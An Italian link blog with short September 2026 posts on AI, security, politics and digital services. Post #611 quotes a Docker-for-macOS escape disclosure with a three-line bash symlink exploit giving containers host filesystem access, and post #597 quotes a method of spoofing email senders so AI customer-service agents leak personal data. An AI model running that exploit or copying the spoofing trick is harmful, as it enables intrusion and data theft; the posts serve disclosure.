Note di Matteo


Settembre 2026

Ora che i poster di feste e sagre sono tutti identici perché fatti con ChatGPT o Gemini, un tizio ha testato per noi come generare stili più unici con ChatGPT. Qua c'è una galleria di prompt (in inglese) per diversi stili:

#613 /
20 settembre 2026
/
09:20
/ #ai#design

Il problema maggiore delle carceri italiane non riguarda chi ci sta dentro, ma chi ne sta fuori e continua a proporle come strumento di riduzione dei pericoli per la comunità quando invece ne sono un fattore di conservazione, dei pericoli, e di aumento. Come dice ogni esperto di criminalità, e persino diversi direttori e direttrici di carceri, le carceri producono criminalità e contribuiscono solo in rare e quasi sempre fortuite occasioni a un "reinserimento" delle persone, con risultati di deterrenza limitati a quote assai parziali dei reati. L'attuale uso delle carceri crea pericolo, per "i cittadini", non sicurezza.

Luca Sofri nella newsletter Charlie del 13 settembre 2026.

#612 /
19 settembre 2026
/
22:22
/ #mondo#italia

Che vulnerabilità in Docker per macOS:

We escaped Docker's hypervisor with three lines of bash. CVE-2026-77179: A container gets complete read and write access to the host filesystem.

When you mount a folder into a container, Docker's VMM uses virtio-fs, and the file server runs on the host.

Because of a TOCTOU bug, if a container opens a file, deletes it while holding its file handle open, and replaces the parent folder with a symlink, the kernel will follow the symlink to anywhere on the host.

mkdir pv && : > pv/.canary && exec 9< pv/.canary
rm pv/.canary; rmdir pv; ln -s /Users/Shared pv
echo CONFIRMED > /proc/self/fd/9
#611 /
19 settembre 2026
/
19:07
/ #security#macos

TIL con Linux kernel 5.13+ si possono restringere le cartelle che un processo può leggere e scrivere con Landlock. Dopo la violazione di OpenAI tramite l'upload di immagini nel forum ufficiale, Discourse ha attivato questa sandbox quando lancia ImageMagick. Esistono librerie per i principali linguaggi di programmazione.

#610 /
18 settembre 2026
/
17:40
/ #linux#openai#security

One of my most successful life-hacks is to avoid people I don’t like or don’t trust. I decline to interact with them socially, and make a deliberate effort to avoid working with them too, even if they are doing much that is beneficial. I feel that hanging out with pleasant, capable people, the people with integrity, has made my life a far better one.

Martin Fowler in I don't like LLMS.

#609 /
18 settembre 2026
/
14:19

A OpenAI gli ingegneri non sono più specializzati in tecnologie specifiche ma contano di più queste qualità:

  • Judgment: is an approach the right one, or is another more optimal? Should a feature be shipped or binned?
  • Prioritization: what’s the next most important thing to work on and what is not worth doing, right now?
  • Agency: the best engineers relentlessly come up with ideas and parallelize with agents as much as possible without being prompted.
  • Taste: what does “great” actually look like? Engineers with good taste produce standout artifacts in functionality, architecture, design, etc.
#608 /
16 settembre 2026
/
11:57
/ #ai#openai

Zero downtime

"Il sistema TreC+ si ferma per manutenzione programmata" per 4 ore, comunica l'ASUIT.

Mi viene in mente questo thread Twitter dove Gergely Orosz argomenta come tirare giù i sistemi per ore, spesso di notte, è un forte segnale di scarsa cultura e maturità ingegneristiche. Si finisce per considerare "eroico" il lavoro degli sviluppatori e degli ingegneri che stanno svegli la notte, quando in realtà non è una buona pratica perché queste persone non imparano niente (e non ci si prende mai la briga di mirare a manutenzioni e migrazioni zero downtime e safe) e ci rimettono comunque inutilmente i clienti.

#607 /
15 settembre 2026
/
13:45
/ #dev#digitalizzazione

Firewall strani

Così scopro dalla Rai che per riattivare un firewall «andato in autoprotezione» (?) bisogna «reinserire migliaia di password di accesso» (??).

Il blocco di un firewall è un evento raro ma può accadere. Ripristinare un sistema cosi complesso in un'ora (con la necessità di reinserire migliaia di password di accesso), sottolinea Trentino digitale, è un successo reso possibile dalla preparazione professionale dell'azienda e dei suoi tecnici.

#606 /
15 settembre 2026
/
13:37
/ #digitalizzazione#informazione#reti

Nuove gTLD Aruba?

Aruba ha grandi ambizioni a questo giro di nuove gTLD e ha fatto domanda per 39 TLD:

  • Technology and digital services: bit, beta, cart, demo, lab, vps, sito
  • Trust Services: pec, rem, sign
  • Sector verticals: aid, bnb, gaming
  • Everyday language and universal terms: all, ask, ciao, daily, easy, fix, gen, genius, hello, hola, human, kit, mars, max, moon, tag, tex, zzz
  • Positive and expressive terms: happy, omg, pop, super, yes
  • Geographic identity: roma
  • Health and wellness: gym, zen

Durante il round precedente (2012 o giù di lì) aveva ottenuto la TLD .cloud.

#605 /
15 settembre 2026
/
11:22
/ #aruba#domini

Fatturazione elettronica in Francia

Arriva la fatturazione elettronica anche in Francia, scrive Fisco Oggi:

Le grandi imprese e le imprese di medie dimensioni, inoltre, hanno anche l’obbligo di emettere le loro fatture in formato elettronico. Obbligo che per le piccole e microimprese scatterà dal 1° settembre 2027.

L'architettura del sistema è diversa da quella italiana:

Rispetto all’Italia, dove l’infrastruttura che permette la gestione delle e-fatture, il cosiddetto Sistema di interscambio, è unico ed è gestito dall’Agenzia delle Entrate nazionale, la Francia ha deciso di affidare agli operatori privati la piattaforma tecnologica per lo scambio delle e-fatture e dei relativi dati. La DGFiP mantiene il controllo regolamentare e informativo del sistema e, per garantire la dovuta trasparenza, ha istituito nel settembre del 2025 un Annuaire de la facturation électronique. Si tratta di un registro centrale che permette di sapere, per ciascuna impresa, quale piattaforma gestisce la sua fatturazione e quali sono gli indirizzi elettronici di fatturazione.

Dal 2030 sarà obbligatoria in tutti gli stati membri dell'UE ed entro il 2035 i sistemi andranno armonizzati.

#604 /
15 settembre 2026
/
10:19
/ #digitalizzazione#italia

The better these tools become at resolving routine incidents, the less practice human responders will get. And when an ambiguous, high-severity incident comes in that automation cannot solve, responding engineers will be in trouble.

These AI-assisted incident response tools, more commonly called “AI SREs” – a term I don’t particularly like – are fantastic in many ways. They feel especially magical when they handle a routine incident at night and you don’t have to wake up for a capacity issue.

The problem is that routine incidents are also how responders “safely” develop an intuition for how their systems behave and fail. When AI runs into a hard, never-seen-before incident it cannot solve, engineers will have to take over with less practice than they would have had before.

Human-factors researcher Lisanne Bainbridge described this paradox in her famous 1983 paper, The Ironies of Automation. She explained that automation reduces operators’ opportunities to practice routine work while leaving them responsible for new and abnormal situations. She argues that, therefore, operators need to be more skilled and receive even more training than before automation.

In the years to come, I predict that the average MTTR for most incidents will go down – thanks to AI-assisted incident response – but that the resolution time will shoot up for complex incidents because incident responders lost touch with their system and are struggling to investigate.

Sylvain Kalache in AI handles incidents, engineers lose touch with their systems.

#603 /
12 settembre 2026
/
17:15
/ #ai

Finally realized why it’s so exhausting and stressful to work with AI agents 8h a day.

When delegating a task, you want to be assured it’s off your plate and you can forget about it, knowing it will be done completely and correctly. AI doesn’t give you that: you need to check it’s doing the right thing, it’s not forgetting anything, not taking short cuts etc.

So it adds to your mental load, rather than removing from it.

Gunnar Morling, software engineer.

#602 /
12 settembre 2026
/
13:31
/ #ai

A Singapore:

[...] gli stipendi dei politici devono essere calcolati considerando il mercato del lavoro, per evitare che le persone competenti «non siano scoraggiate dal farsi avanti per guidare il paese». Allo stesso tempo non devono essere troppo alti, per riflettere un certo spirito di servizio, e soprattutto devono essere trasparenti e legati ai risultati del singolo ministro e del paese.

(Il Post)

#601 /
12 settembre 2026
/
13:29

NextSpoons. Quale sarà la prossima azienda a essere acquisita da Bending Spoons?

Top 5 attuale:

#600 /
11 settembre 2026
/
20:03
/ #bending-spoons

Dark/light mode

Discussioni sul web su quanti stati dovrebbero avere i toggle modalità diurna/notturna in app e siti. Cito il riassunto da Web Weekly 199:

How much controversy can there be around dark/light mode toggles? Turns out, a lot. Lea Verou kicked off a whole thing. People have opinions on these little two- or three-state toggles.

So, Lea started the discussion by arguing that website visitors don't care about dark mode toggles (I agree) and that they only reach for them when something's off.

A dark mode toggle is a temporary comfort adjustment. [...] It’s situational, it’s immediate, and it’s usually about the environment you’re in rather than a considered long-term stance on color schemes.

From there, she argues that a dark mode toggle should only have two options: the system preference (shown as dark or light) and the opposite. That's smart. Whenever things are different from the system, you can store the preference that's not the system default. If it matches their general settings, there's nothing to do, and if you go back to the system setting, you clear the preference. This approach seems reasonable to me at first sight.

Bramus disagreed, though.

When building these types of control, I think that one of the main goals here should be to keep things predictable for users.

And well, that's a strong point, too, I'd say. A little sun icon that actually means "system preferences" is a bit tricky to understand if you really care about light and dark modes. I tend to agree here, and it seems like a "Agree to disagree." case, but the whole community had feelings about this. Lea shared more feedback in a follow-up post. And it closed with a banger:

And then it dawned on me: all these persistent dark mode toggles I had seen, literally all of them have been on developer-facing sites!

And I think that's what I came to conclude, too. It's an interesting discussion to have but I really don't think normies care too much about two, three, or no dark/light mode states. Things can always be better and smoother, but for this case I think it's just us nerds who love discussing these things. 😅

#599 /
10 settembre 2026
/
16:17
/ #web-dev

GPT-6

Armin Ronacher mostra con degli esempi come GPT-6 Astra scriva codice illegibile. "It's AGI if you don't look". Codice denso e oscuro e assenza totale di commenti. La fine di un'arte.

#598 /
9 settembre 2026
/
20:28
/ #ai#codex#openai

Hacking AI customer service agents

Il customer service completamente automatizzato con AI aumenta i rischi legati allo spoofing:

how i hacked 320+ companies that replaced their cs team with "smart" ai agents:

  1. drafted a gdpr request to support@
  2. changed the FROM header from my e-mail to yours (spoofing)
  3. put myself in CC
  4. ai agent responds with YOUR data to BOTH of us 😈

Qui il tweet e qui l'articolo.

#597 /
8 settembre 2026
/
20:08
/ #ai#security

TeamSystem e Zucchetti

Se fossero nate a San Francisco le chiameremmo ✨decacorn✨, cioè società leggendarie valutate più di dieci miliardi. Siccome sono nate a Pesaro e a Lodi, le chiamiamo gestionali.

Giulio Michelon in Esistono i decacorn in Italia?

#596 /
8 settembre 2026
/
09:37
/ #innovazione#italia

Autistici/Inventati, Banca Etica e la dipendenza dagli USA

Notevole comunicato stampa di Banca Etica che commenta la chiusura di Autistici/Inventati, storica associazione di attivismo sociale e digitale italiana.

La banca, a cui il collettivo si affida dal 2018 per il proprio conto corrente, scrive che si trovano costretti a sospendere il conto per rispettare la lista sanzionatoria OFAC del governo statunitense, che dovrebbe essere riservata all'antiterrorismo ma che in questo caso viene usata per fini politici.

La parte notevole è che la banca sta chiedendo pareri da tutte le parti per capire se c'è un modo per non rispettare questa decisione del governo statunitense, ma che è forte il rischio di creare un danno agli altri clienti della banca vista la totale dipendenza del sistema dei pagamenti dagli Stati Uniti:

[...] Una banca italiana che mantenga rapporti con un soggetto inserito nelle liste OFAC, potrebbe essere oggetto di “sanzioni secondarie” che implicano la cessazione di ogni servizio erogato da intermediari statunitensi: questo implicherebbe per tutti i clienti di Banca Etica l’impossibilità di utilizzare carte di credito e carte di debito (che oggi dipendono da un sostanziale monopolio di operatori USA) e l’impossibilità di effettuare pagamenti in aree extra-euro per i quali sono necessari intermediari finanziari quasi sempre statunitensi.

#595 /
7 settembre 2026
/
13:38


Gli italiani invocano spesso rivolgimenti, pensano di risolvere in velleitari disegni di rivoluzione i loro sbotti di indignazione, si lagnano che mai nulla cambia per davvero: ma al dunque la stasi ci conforta, l’accidia vince ogni slancio incendiario. [...]

Ci lamentiamo, vomitiamo bile sui social ma poi abbiamo paura che le cose stiano cambiando veramente; il futuro ci spaventa e di fronte a questo spavento, di fronte al turbinare vorticoso della storia, chiusi nelle casematte del nostro rancore cerchiamo un appiglio solido in ciò che non muta, che non si corrode: Dio, patria, famiglia, cucina tipica e un po’ di sana evasione fiscale.

Valerio Valentini in L’irrefrenabile immobilismo di Giorgia Meloni.

#593 /
4 settembre 2026
/
20:55
/ #italia

WeatherNext3

Il nuovo modello di previsione del meteo di Google WeatherNext3 è il nuovo stato dell'arte nelle previsioni meteo e la cosa migliore è che non è solo ricerca ma finisce direttamente nei prodotti e a disposizione del pubblico:

To bring these breakthroughs out of the lab and into the real world, we’re integrating WeatherNext 3 across Google’s core ecosystem and beyond:

  • High-resolution forecast data: We’re making global weather predictions, updated hourly and ready to integrate into your workflows with no model setup required. This enables researchers, developers and businesses to query the data in BigQuery and Earth Engine, or bulk-download from Google Cloud Storage.
  • Available globally: WeatherNext 3 will begin powering weather experiences within Google Search, Gemini app, Google Maps, Google Maps Platform Weather API, and Google Earth Engine starting today. The update dramatically improves longer term forecasts. When planning a day or more ahead, people will see up to 50% more accurate precipitation forecasts — with the greatest improvements in regions where forecasts have historically been less reliable. So if you’re packing for a weekend trip or deciding the best day for an outdoor activity, you’ll now get more accurate predictions to help you plan.

I dati si possono consultare su mappa qui nel Weather Lab.

#592 /
3 settembre 2026
/
18:00
/ #ai

AI enables low-quality results, encourages lack of discipline and skill under the excuse of efficiency, it makes people use their brains less, and personally it just kills all the fun.

Ilya Miskov, designer.

#591 /
2 settembre 2026
/
23:23
/ #ai#mondo